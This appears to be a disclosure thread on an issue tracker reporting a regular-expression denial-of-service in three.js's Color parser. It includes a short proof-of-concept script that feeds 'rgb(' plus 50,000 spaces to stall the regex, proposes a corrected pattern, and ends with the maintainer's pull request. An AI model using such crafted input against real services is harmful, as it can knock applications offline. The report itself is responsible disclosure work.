ReDoS in three

[yetingli]

Hi,

I would like to report a Regular Expression Denial of Service (REDoS) vulnerability in three.

It allows cause a denial of service when handling rgb or hsl colors.

The vulnerable regex is located in

three.js/src/math/Color.js

Line 166 in 2d04b4b

if ( m = /^((?:rgb|hsl)a?)\(\s*([^\)]*)\)/.exec( style ) ) {

To Reproduce

Steps to reproduce the behavior:

Code

var three = require('three')



function build_blank (n) {
 var ret = "rgb("
 for (var i = 0; i < n; i++) {
  ret += " "
 }

 return ret + "";
}

var Color = three.Color

var time = Date.now();
new Color(build_blank(50000))
var time_cost = Date.now() - time;
console.log(time_cost+" ms")

I am willing to suggest that you replace the regex /^((?:rgb|hsl)a?)\(\s*([^\)]*)\)/ with /^((?:rgb|hsl)a?)\(\s*([^\)\s]*)\)/

[mrdoob]

I made a pull request for this: #21142